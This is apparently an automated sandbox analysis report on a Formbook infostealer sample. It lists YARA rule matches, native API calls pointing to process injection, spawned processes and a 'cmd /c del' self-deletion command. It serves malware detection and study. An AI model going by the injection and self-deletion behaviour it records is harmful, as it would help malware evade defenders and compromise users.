          Source: 00000001.00000002.743981788.00000000005B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.717484529.000000000F349000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.717484529.000000000F349000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.744409415.00000000005E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.744409415.00000000005E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.935144259.0000000000CF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.935144259.0000000000CF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: TT COPY_02101011.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 1.1.TT COPY_02101011.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.TT COPY_02101011.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.TT COPY_02101011.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.TT COPY_02101011.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.TT COPY_02101011.exe.2a30000.1.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.TT COPY_02101011.exe.2a30000.1.unpack, type: UNPACKEDPE, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.TT COPY_02101011.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.TT COPY_02101011.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.TT COPY_02101011.exe.400000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.TT COPY_02101011.exe.400000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.TT COPY_02101011.exe.400000.3.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.TT COPY_02101011.exe.400000.3.unpack, type: UNPACKEDPE, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.TT COPY_02101011.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.TT COPY_02101011.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.TT COPY_02101011.exe.400000.3.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.TT COPY_02101011.exe.400000.3.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.TT COPY_02101011.exe.2a30000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.TT COPY_02101011.exe.2a30000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.TT COPY_02101011.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.TT COPY_02101011.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.TT COPY_02101011.exe.400000.2.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.TT COPY_02101011.exe.400000.2.unpack, type: UNPACKEDPE, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.678695339.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.678695339.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.680245219.0000000000400000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.680245219.0000000000400000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.679558330.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.679558330.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.935086898.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.935086898.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.732659065.000000000F349000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.732659065.000000000F349000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.681771508.0000000002A30000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.681771508.0000000002A30000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.743981788.00000000005B0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.743981788.00000000005B0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.717484529.000000000F349000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.717484529.000000000F349000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.744409415.00000000005E0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.744409415.00000000005E0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.935144259.0000000000CF0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.935144259.0000000000CF0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\TT COPY_02101011.exe, Code function: 0_2_004030E3 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: String function: 0321B150 appears 45 times
          Source: C:\Users\user\Desktop\TT COPY_02101011.exe, Code function: String function: 00A9B150 appears 34 times
          Source: C:\Users\user\Desktop\TT COPY_02101011.exe, Code function: 1_2_004185F0 NtCreateFile
          Source: C:\Users\user\Desktop\TT COPY_02101011.exe, Code function: 1_2_004186A0 NtReadFile
          Source: C:\Users\user\Desktop\TT COPY_02101011.exe, Code function: 1_2_00418720 NtClose
          Source: C:\Users\user\Desktop\TT COPY_02101011.exe, Code function: 1_2_004187D0 NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\TT COPY_02101011.exe, Code function: 1_2_00AD98F0 NtReadVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\TT COPY_02101011.exe, Code function: 1_2_00AD9860 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Users\user\Desktop\TT COPY_02101011.exe, Code function: 1_2_00AD9840 NtDelayExecution,LdrInitializeThunk
          Source: C:\Users\user\Desktop\TT COPY_02101011.exe, Code function: 1_2_00AD99A0 NtCreateSection,LdrInitializeThunk
          Source: C:\Users\user\Desktop\TT COPY_02101011.exe, Code function: 1_2_00AD9910 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Users\user\Desktop\TT COPY_02101011.exe, Code function: 1_2_00AD9A20 NtResumeThread,LdrInitializeThunk
          Source: C:\Users\user\Desktop\TT COPY_02101011.exe, Code function: 1_2_00AD9A00 NtProtectVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\TT COPY_02101011.exe, Code function: 1_2_00AD9A50 NtCreateFile,LdrInitializeThunk
          Source: C:\Users\user\Desktop\TT COPY_02101011.exe, Code function: 1_2_00AD95D0 NtClose,LdrInitializeThunk
          Source: C:\Users\user\Desktop\TT COPY_02101011.exe, Code function: 1_2_00AD9540 NtReadFile,LdrInitializeThunk
          Source: C:\Users\user\Desktop\TT COPY_02101011.exe, Code function: 1_2_00AD96E0 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\TT COPY_02101011.exe, Code function: 1_2_00AD9660 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\TT COPY_02101011.exe, Code function: 1_2_00AD97A0 NtUnmapViewOfSection,LdrInitializeThunk
          Source: C:\Users\user\Desktop\TT COPY_02101011.exe, Code function: 1_2_00AD9780 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Users\user\Desktop\TT COPY_02101011.exe, Code function: 1_2_00AD9FE0 NtCreateMutant,LdrInitializeThunk
          Source: C:\Users\user\Desktop\TT COPY_02101011.exe, Code function: 1_2_00AD9710 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Users\user\Desktop\TT COPY_02101011.exe, Code function: 1_2_00AD98A0 NtWriteVirtualMemory
          Source: C:\Users\user\Desktop\TT COPY_02101011.exe, Code function: 1_2_00AD9820 NtEnumerateKey
          Source: C:\Users\user\Desktop\TT COPY_02101011.exe, Code function: 1_2_00ADB040 NtSuspendThread
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AD99D0 NtCreateProcessEx,1_2_00AD99D0
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AD9950 NtQueueApcThread,1_2_00AD9950
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AD9A80 NtOpenDirectoryObject,1_2_00AD9A80
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AD9A10 NtQuerySection,1_2_00AD9A10
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00ADA3B0 NtGetContextThread,1_2_00ADA3B0
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AD9B00 NtSetValueKey,1_2_00AD9B00
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AD95F0 NtQueryInformationFile,1_2_00AD95F0
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AD9520 NtWaitForSingleObject,1_2_00AD9520
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00ADAD30 NtSetContextThread,1_2_00ADAD30
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AD9560 NtWriteFile,1_2_00AD9560
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AD96D0 NtCreateKey,1_2_00AD96D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03259A50 NtCreateFile,LdrInitializeThunk,9_2_03259A50
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03259910 NtAdjustPrivilegesToken,LdrInitializeThunk,9_2_03259910
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032599A0 NtCreateSection,LdrInitializeThunk,9_2_032599A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03259860 NtQuerySystemInformation,LdrInitializeThunk,9_2_03259860
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03259840 NtDelayExecution,LdrInitializeThunk,9_2_03259840
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03259710 NtQueryInformationToken,LdrInitializeThunk,9_2_03259710
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03259780 NtMapViewOfSection,LdrInitializeThunk,9_2_03259780
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03259FE0 NtCreateMutant,LdrInitializeThunk,9_2_03259FE0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03259660 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_03259660
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03259650 NtQueryValueKey,LdrInitializeThunk,9_2_03259650
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032596E0 NtFreeVirtualMemory,LdrInitializeThunk,9_2_032596E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032596D0 NtCreateKey,LdrInitializeThunk,9_2_032596D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03259540 NtReadFile,LdrInitializeThunk,9_2_03259540
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032595D0 NtClose,LdrInitializeThunk,9_2_032595D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03259B00 NtSetValueKey,9_2_03259B00
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0325A3B0 NtGetContextThread,9_2_0325A3B0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03259A20 NtResumeThread,9_2_03259A20
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03259A00 NtProtectVirtualMemory,9_2_03259A00
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03259A10 NtQuerySection,9_2_03259A10
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03259A80 NtOpenDirectoryObject,9_2_03259A80
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03259950 NtQueueApcThread,9_2_03259950
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032599D0 NtCreateProcessEx,9_2_032599D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03259820 NtEnumerateKey,9_2_03259820
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0325B040 NtSuspendThread,9_2_0325B040
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032598A0 NtWriteVirtualMemory,9_2_032598A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032598F0 NtReadVirtualMemory,9_2_032598F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03259730 NtQueryVirtualMemory,9_2_03259730
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0325A710 NtOpenProcessToken,9_2_0325A710
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03259760 NtOpenProcess,9_2_03259760
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0325A770 NtOpenThread,9_2_0325A770
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03259770 NtSetInformationFile,9_2_03259770
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032597A0 NtUnmapViewOfSection,9_2_032597A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03259610 NtEnumerateValueKey,9_2_03259610
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03259670 NtQueryInformationProcess,9_2_03259670
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03259520 NtWaitForSingleObject,9_2_03259520
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0325AD30 NtSetContextThread,9_2_0325AD30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03259560 NtWriteFile,9_2_03259560
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032595F0 NtQueryInformationFile,9_2_032595F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_007785F0 NtCreateFile,9_2_007785F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_007786A0 NtReadFile,9_2_007786A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_00778720 NtClose,9_2_00778720
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_007787D0 NtAllocateVirtualMemory,9_2_007787D0
          Source: TT COPY_02101011.exe, 00000000.00000003.679935537.0000000002B86000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs TT COPY_02101011.exe
          Source: TT COPY_02101011.exe, 00000000.00000003.679172952.0000000002D1F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs TT COPY_02101011.exe
          Source: TT COPY_02101011.exe, 00000001.00000002.746909358.0000000000B8F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs TT COPY_02101011.exe
          Source: TT COPY_02101011.exe, 00000001.00000002.748099738.0000000000D1F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs TT COPY_02101011.exe
          Source: TT COPY_02101011.exeVirustotal: Detection: 36%
          Source: TT COPY_02101011.exeReversingLabs: Detection: 15%
          Source: C:\Users\user\Desktop\TT COPY_02101011.exe File read: C:\Users\user\Desktop\TT COPY_02101011.exe
          Source: TT COPY_02101011.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\TT COPY_02101011.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\TT COPY_02101011.exe "C:\Users\user\Desktop\TT COPY_02101011.exe"
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeProcess created: C:\Users\user\Desktop\TT COPY_02101011.exe "C:\Users\user\Desktop\TT COPY_02101011.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\TT COPY_02101011.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\TT COPY_02101011.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: C:\Users\user\Desktop\TT COPY_02101011.exe File created: C:\Users\user\AppData\Local\Temp\nsxA74D.tmp
